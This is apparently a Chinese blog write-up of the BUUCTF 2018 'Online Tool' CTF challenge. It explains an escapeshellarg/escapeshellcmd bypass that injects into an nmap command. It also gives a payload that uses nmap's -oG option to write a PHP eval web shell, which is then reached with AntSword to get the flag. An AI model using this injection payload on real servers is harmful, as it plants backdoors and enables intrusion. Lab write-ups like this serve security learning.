[BUUCTF 2018]Online Tool

本文介绍了PHP中的超全局变量$_SERVER,并探讨了如何利用其进行命令注入,特别是通过nmap的-oG参数写入一句话木马。博主详细解释了攻击过程,包括构造payload,利用蚁剑连接并寻找flag。文章强调了安全防护的重要性。
摘要由CSDN通过智能技术生成

[BUUCTF 2018]Online Tool

在这里插入图片描述

$_SERVER是php中一个超全局变量,是包含了头信息、路径、脚本位置等信息的一个数组;
其实第一个if不用绕,没用。

整体看一下,先绕过一系列的东西,然后执行了nmap的命令,其中host是传入的参数,这里应该是注入点。
关于nmap
查了一下,nmap存在一个参数 -oG 可以写入一个文件。

nmap <?php phpinfo();?> -oG phpinfo.php; 这样

所以大体思路是绕过在这里插入图片描述

然后,用nmap的-oG命令写入一个一句话木马。
payload: ?host=’ <?php @eval($_POST["hack"]);?> -oG hack.php ’
然后 :
在这里插入图片描述

根据 sandbox的路径,用蚁剑连上,去根目录找flag就行了

在这里插入图片描述

buu是动态的flag,直接copy没有用

参考引用:
php超全局变量 $_SERVER: https://www.cnblogs.com/pawn-i/p/11328693.html
PHP escapeshellarg()+escapeshellcmd() 之殇: https://paper.seebug.org/164/

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值